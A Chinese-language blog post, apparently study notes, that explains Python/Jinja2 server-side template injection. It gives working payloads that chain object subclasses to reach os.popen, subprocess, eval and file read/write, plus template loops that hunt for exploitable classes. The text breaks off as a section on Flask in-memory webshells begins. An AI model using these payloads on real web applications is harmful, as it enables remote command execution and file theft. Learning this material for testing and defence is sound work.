<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    
    <meta name="author" content="kivvs">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes ASAP (before DOMContentLoaded)
            (function() {
                const addBodyClass = () => {
                    const b = document.body;
                    if (!b) return false;
                    b.classList.add(theme + "-mode");
                    return true;
                };

                // Try immediately
                if (addBodyClass()) return;

                // Observe until body exists
                const mo = new MutationObserver(() => {
                    if (addBodyClass()) mo.disconnect();
                });
                mo.observe(document.documentElement, { childList: true, subtree: true });
            })();
        })();
    </script>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://kivvs.github.io/2026/08/14/深入解析ssti模板注入/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="深入解析SSTI模板注入">
<meta property="og:url" content="https://kivvs.github.io/2026/08/14/%E6%B7%B1%E5%85%A5%E8%A7%A3%E6%9E%90SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="kivvs">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kivvs.github.io/images/redefine-og.webp">
<meta property="article:published_time" content="2026-08-14T11:51:54.000Z">
<meta property="article:modified_time" content="2026-08-14T14:45:49.490Z">
<meta property="article:author" content="kivvs">
<meta property="article:tag" content="SSTI">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kivvs.github.io/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&amp;h=180&amp;c=7&amp;r=0&amp;o=7&amp;dpr=1.5&amp;pid=1.7&amp;rm=3" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&amp;h=180&amp;c=7&amp;r=0&amp;o=7&amp;dpr=1.5&amp;pid=1.7&amp;rm=3">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&h=180&c=7&r=0&o=7&dpr=1.5&pid=1.7&rm=3">
    <!--- Page Info-->
    
    <title>
        
            深入解析SSTI模板注入 | kivvs
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"kivvs.github.io","root":"/","language":"zh-CN"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Kivvs 个人博客","subtitle":{"text":[],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":[{"icon":"fa-brands fa-github","url":null},{"icon":"fa-brands fa-twitter","url":null},{"icon":"fa-solid fa-at","url":"you@example.com"},{"icon":"fa-brands fa-telegram","url":null},{"icon":"/images/custom-icon.svg","url":null}],"qrs":[{"icon":"fa-brands fa-weixin","qr":null},{"icon":"/images/custom-icon.svg","qr":null}]}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1","theme":{"light":"default","dark":"dark"}}},"version":"2.9.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur","masonry":{"batch_size":12,"initial_batch_size":24}},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footer":{"runtime":true,"icon":"<i class=\"fa-solid fa-heart fa-beat\" style=\"--fa-animation-duration: 0.5s; color: #f54545\"></i>","start":"2022/8/17 11:45:14","statistics":true,"customize":null,"icp":{"enable":false,"number":null,"url":null}},"footerStart":"2022/8/17 11:45:14","mermaid":{"style":{"light":"default","dark":"dark"}}};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.i18n = {"search":"站内搜索您需要的内容...","toc":"目录","prev":"上一页","next":"下一页","prev_posts":"上一篇","next_posts":"下一篇","page":"第 %d 页","recent_posts":"最新文章","share":"分享","powered_by":"由 %s 驱动","theme":"主题","rss_feed":"RSS Feed","category":"分类","categories":"分类","tag":"标签","tags":"标签","post":"文章","posts":"文章","tagcloud":"标签云","comment":"评论","comments":"评论","top":"置顶","sticky":"置顶","go-back-home":"回到首页","masonry_loading":"照片加载中...","image_viewer":"图片查看器","close":"关闭","exif":{"title":"EXIF","cards":{"camera":"相机","lens":"镜头","exposure":"曝光","other":"其他"},"fields":{"make":"品牌","model":"机型","date_taken":"拍摄时间","lens_model":"镜头","focal_length":"焦距","focus_mode":"对焦模式","shutter":"快门","aperture":"光圈","iso":"感光度","exposure_program":"曝光程序","exposure_compensation":"曝光补偿","metering_mode":"测光模式","flash":"闪光灯","white_balance":"白平衡","latitude":"纬度","longitude":"经度","altitude":"海拔"},"status":{"loading":"加载中...","no_exif":"无 EXIF 信息","library_missing":"EXIF 库未加载","image_source_missing":"图片地址不可用","unavailable":"EXIF 不可用（可能被 CORS 阻止或缺少元数据）","flag_unavailable":"EXIF 不可用"}},"home":"首页","archive":"归档","archives":"归档","about":"关于","links":"链接","link":"链接","friends":"友情链接","friend":"友情链接","timeline":"时间轴","shuoshuo":"说说","bookmarks":"书签","site_uv":"访问人数","site_pv":"总访问量","read_more":"阅读全文","wordcount":"字","min2read":"分钟","changelog":"更新日志","status":"状态","runtime":"博客已运行","days":"天","hours":"小时","minutes":"分钟","seconds":"秒","optimized_by":"并由 Evan 进行优化","rights":"版权所有","site_posts":"共撰写了 %s 篇文章","site_wordcount":"共 %s 字","copyright":{"title":"标题","author":"作者","link":"链接","create_time":"创建于","update_time":"更新于","license_title":"版权声明","license_content":"本文章采用 %s 进行许可。","all_rights_reserved":"版权所有 &#169 %s，禁止转载。","public_domain":"本文为公有领域作品，可自由转载、引用。"},"ago":{"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"},"create_time":"创建","update_time":"更新","expired":"这篇文章最后更新于 %s 天前，内容可能已经过时。"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 8.1.2"></head>


<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                kivvs
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    首页
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                首页
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">7</div>
        <div class="label text-third-text-color text-sm">标签</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">分类</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">20</div>
        <div class="label text-third-text-color text-sm">文章</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">深入解析SSTI模板注入</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] shrink-0 rounded-medium border border-border-color p-px">
				<img src="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&h=180&c=7&r=0&o=7&dpr=1.5&pid=1.7&rm=3">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">kivvs</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv3</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2026-08-14 19:51:54</span>
        <span class="mobile">2026-08-14 19:51:54</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2026-08-14 22:45:49</span>
            <span class="mobile">2026-08-14 22:45:49</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/web%E5%AD%A6%E4%B9%A0/">web学习</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/web/">web</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/SSTI/">SSTI</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="1-深入解析SSTI模板注入"><a href="#1-深入解析SSTI模板注入" class="headerlink" title="1.深入解析SSTI模板注入"></a>1.深入解析SSTI模板注入</h1><p>ssti一般的payload如下 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&#x27;&#x27;</span>.__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">166</span>].__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>]</span><br><span class="line">[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;calc&quot;).read()&#x27;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;<span class="string">&#x27;&#x27;</span>.__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">79</span>].__init__.__globals__[<span class="string">&#x27;os&#x27;</span>].</span><br><span class="line">popen(<span class="string">&#x27;calc&#x27;</span>).read()&#125;&#125;</span><br><span class="line">&#123;&#123;<span class="string">&#x27;&#x27;</span>.__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">117</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>]</span><br><span class="line">(<span class="string">&#x27;ls /&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>在上⾯常⻅的 Payload 中，都是拿到⼀个 Object 后，寻找其⼦类中导⼊了危险模块或者存在危险⽅法导致可以直接或者间接调⽤执⾏代码&#x2F;命令。 </p>
<blockquote>
<p>object 是 Python 中所有类的基类。它是所有类的最终基类，所有的类都继承自它，即使你没有显 </p>
<p>式地指定基类。它定义了一些基本的方法，比如 <strong>init</strong> </p>
</blockquote>
<p>由于 Python 万物皆对象 —— 数字、字符串、元组、列表、字典等所有内置数据类型， 函数 、⽅法 、 类 、模块， 在 Python 中所有的⼀切都是对象并使⽤对象模型来存储数据。 于是可以通过链式访问 Python 对象的特殊属性和调⽤魔术⽅法来寻找可⽤的⼦类 </p>
<p>所以对于危险函数的调用思路就很清晰 </p>
<h5 id="思路⼀："><a href="#思路⼀：" class="headerlink" title="思路⼀："></a>思路⼀：</h5><p>如果 object 的某个派⽣类中存在危险⽅法，就可以直接拿来⽤ </p>
<h5 id="思路⼆："><a href="#思路⼆：" class="headerlink" title="思路⼆："></a>思路⼆：</h5><p> 如果 object 的某个派⽣类导⼊了危险模块，就可以链式调⽤危险⽅法 </p>
<h5 id="思路三："><a href="#思路三：" class="headerlink" title="思路三："></a>思路三：</h5><p>如果 object 的某个派⽣类由于导⼊了某些标准库模块，从⽽间接导⼊了危险模块的危险⽅法，也可以 通过链式调⽤ </p>
<blockquote>
<p>派生类（Subclass）是从一个基类（父类）继承的类。派生类可以继承父类的属性和方法，也可 </p>
<p>以对它们进行重写或扩展 </p>
</blockquote>
<h4 id="寻找导入了危险方法可以直接调用的"><a href="#寻找导入了危险方法可以直接调用的" class="headerlink" title="寻找导入了危险方法可以直接调用的"></a>寻找导入了危险方法可以直接调用的</h4><p>如：**文件读写 **的⼀些⽅法，在 Python3 中重构了 I&#x2F;O ⼦系统，所以⽂件对象变为了 _io ，先找到基类 _IOBase ，然后寻找其⼦类 _io._RawIOBase 的⼦类 _io.FileIO ，利⽤这个类来读写⽂件。或者使⽤ FileLoader.get_data() </p>
<p>payload：</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 读取文件</span></span><br><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">101</span>].__subclasses__()[<span class="number">0</span>].__subclasses__()</span><br><span class="line">[<span class="number">0</span>](<span class="string">&#x27;C:/Windows/win.ini&#x27;</span>).read()</span><br><span class="line"><span class="comment"># 写入文件</span></span><br><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">101</span>].__subclasses__()[<span class="number">0</span>].__subclasses__()</span><br><span class="line">[<span class="number">0</span>](<span class="string">&#x27;C:/f.txt&#x27;</span>,<span class="string">&#x27;w+&#x27;</span>).write(<span class="string">&#x27;string&#x27;</span>.encode(<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line"><span class="comment"># 读取配置文件</span></span><br><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">94</span>][<span class="string">&#x27;get_data&#x27;</span>](<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;C:/Windows/win.ini&#x27;</span>)</span><br></pre></td></tr></table></figure></div>

<p>有了前边的引入这些payload就容易理解，就是不断地利用派生类继承寻找他的子类 </p>
<blockquote>
<p>这里插入一点莫名奇妙的东西 </p>
<p>__class__用于获取对象实例的类。__base__用于获取类的直接父类。 </p>
<p>对于字符串 ‘’，它是 str 类型的对象。 </p>
<p>对于列表 []，它是 list 类型的对象。 </p>
<p>对于元组 ()，它是 tuple 类型的对象。 </p>
<p>对于任意字母 x，它通常是某个类的实例，或者是一个变量，其实还是字符串对象（个人理解） </p>
<p>这也就是为什么ssti能够以’’等开头，就是为了构造一个对象 </p>
</blockquote>
<p>这⾥可以直接找基类，也可以找到 _io 后遍历⼦类</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 遍历查找&#x27;_IOBase&#x27;,&#x27;FileLoader&#x27;</span></span><br><span class="line">&#123;% <span class="built_in">set</span> tmp = namespace(idx=<span class="number">0</span>, obj=<span class="string">&#x27;&#x27;</span>.__class__.__bases__[<span class="number">0</span>], </span><br><span class="line">fs=[<span class="string">&#x27;_IOBase&#x27;</span>,<span class="string">&#x27;FileLoader&#x27;</span>]) %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> k <span class="keyword">in</span> tmp.obj.__subclasses__() %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> f <span class="keyword">in</span> tmp.fs %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> f <span class="keyword">in</span> k.__name__ %&#125;</span><br><span class="line">&lt;li&gt;&#123;&#123; f &#125;&#125; | &#123;&#123; k.__class__ &#125;&#125; &#123;&#123; k.__module__ &#125;&#125; &#123;&#123; k.__name__ &#125;&#125; | &#123;&#123; tmp.idx &#125;&#125;</span><br><span class="line">&lt;/li&gt;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> tmp.idx = tmp.idx + <span class="number">1</span> %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>

<ul>
<li>枚举 Python 当前运行环境中的所有类，特别是那些继承自 object 类的类。 </li>
<li>通过检查每个类的名称，寻找是否包含 ‘_IOBase’ 或 ‘FileLoader’ 字符串。 </li>
<li>如果找到了匹配的类，则输出该类的一些信息，包括类的类型、所在的模块和类名。 </li>
<li>输出的 HTML 列表项会显示出当前匹配的类，以及当前的计数。</li>
</ul>
<hr>
<h4 id="寻找直接或间接导入了危险模块从而调用危险方法的以及可以导入其他模块的"><a href="#寻找直接或间接导入了危险模块从而调用危险方法的以及可以导入其他模块的" class="headerlink" title="寻找直接或间接导入了危险模块从而调用危险方法的以及可以导入其他模块的"></a>寻找直接或间接导入了危险模块从而调用危险方法的以及可以导入其他模块的</h4><p>如：** os sys subprocess importlib linecache _collections_abc timeit **找到模块后调⽤就⾏，下⾯ 的Payload是后⾯部分，前⾯加上模块对应的⼦类 ‘’.<strong>class</strong>.<strong>bases</strong>[0].<strong>subclasses</strong>()[id]， 其实都是围绕这 **os subprocess **来做 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># os</span></span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;os&#x27;</span>].popen(<span class="string">&#x27;id&#x27;</span>).read()</span><br><span class="line"><span class="comment"># sys</span></span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;sys&#x27;</span>].modules[<span class="string">&#x27;os&#x27;</span>].popen(<span class="string">&#x27;id&#x27;</span>).read()</span><br><span class="line"><span class="comment"># subprocess</span></span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;subprocess&#x27;</span>].call(<span class="string">&#x27;calc&#x27;</span>) <span class="comment"># ⽆回显</span></span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;subprocess&#x27;</span>].run(<span class="string">&#x27;id&#x27;</span>,</span><br><span class="line">stdout=-<span class="number">1</span>).__dict__[<span class="string">&#x27;stdout&#x27;</span>].strip().decode(<span class="string">&#x27;utf-8&#x27;</span>, errors=<span class="string">&#x27;replace&#x27;</span>)</span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;subprocess&#x27;</span>].Popen(<span class="string">&#x27;whoami&#x27;</span>,shell=<span class="literal">True</span>,stdout=-<span class="number">1</span>).</span><br><span class="line">communicate()[<span class="number">0</span>].strip().decode(<span class="string">&#x27;utf-8&#x27;</span>, errors=<span class="string">&#x27;replace&#x27;</span>)</span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;subprocess&#x27;</span>].check_output(<span class="string">&#x27;id&#x27;</span>).strip().</span><br><span class="line">decode(<span class="string">&#x27;utf-8&#x27;</span>,errors=<span class="string">&#x27;replace&#x27;</span>)</span><br><span class="line"><span class="comment"># importlib</span></span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;importlib&#x27;</span>][<span class="string">&quot;import_module&quot;</span>](<span class="string">&quot;os&quot;</span>)[<span class="string">&quot;popen&quot;</span>](<span class="string">&quot;id&quot;</span>).read()</span><br><span class="line"><span class="comment"># linecache</span></span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;linecache&#x27;</span>][<span class="string">&#x27;sys&#x27;</span>].modules[<span class="string">&#x27;os&#x27;</span>].popen(<span class="string">&#x27;id&#x27;</span>).read()</span><br></pre></td></tr></table></figure></div>

<h4 id="寻找导入了危险模块的类"><a href="#寻找导入了危险模块的类" class="headerlink" title="寻找导入了危险模块的类"></a>寻找导入了危险模块的类</h4><div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> tmp = namespace(idx=<span class="number">0</span>, obj=<span class="string">&#x27;&#x27;</span>.__class__.__bases__[<span class="number">0</span>], ms=[<span class="string">&#x27;os&#x27;</span>,<span class="string">&#x27;sys&#x27;</span>,<span class="string">&#x27;subprocess&#x27;</span>]) %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> k <span class="keyword">in</span> tmp.obj.__subclasses__() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> <span class="string">&#x27;__globals__&#x27;</span> <span class="keyword">in</span> tmp.obj.__dir__( k.__init__ ) %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> m <span class="keyword">in</span> tmp.ms %&#125;&#123;% <span class="keyword">if</span> m <span class="keyword">in</span> k.__init__.__globals__.keys() %&#125;</span><br><span class="line">&lt;lv&gt;&#123;&#123; m &#125;&#125; | &#123;&#123; k.__class__ &#125;&#125; &#123;&#123; k.__module__ &#125;&#125; &#123;&#123; k.__name__ &#125;&#125; | &#123;&#123; tmp.idx &#125;&#125;&lt;/lv&gt;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> tmp.idx = tmp.idx + <span class="number">1</span> %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>

<hr>
<p>**这个payload也会遍历出可以利用的类 **</p>
<p>这⾥有⼀个⽐较特殊的模块 <strong>builtins</strong> ， <strong>builtins</strong> 模块是 Python 中的⼀个内置模块，它包含了 ⼀些内置函数、异常和类型。这些函数、异常和类型可以在 Python 中直接访问，⽽不需要导⼊任何模 块。所以由这么⼀个万能的⽅法：在内建模块⾥直接调⽤ eval 或者 exec 函数来执⾏ Python 代码段， 在代码段中导⼊模块实现命令执⾏。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__base__.__subclasses__()[<span class="built_in">id</span>]</span><br><span class="line">.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">eval</span>(<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;</span>)</span><br></pre></td></tr></table></figure></div>



<h1 id="2-Flask中的内存🐎"><a href="#2-Flask中的内存🐎" class="headerlink" title="2.Flask中的内存🐎"></a>2.Flask中的内存🐎</h1><p>在 Flask 中有⼀个 url_for 函数，可以根据视图函数⽣成⼀个url，⽐如在模板中写上如下内容，其中 </p>
<p>test 是路由 &#x2F;test 的视图函数名 </p>
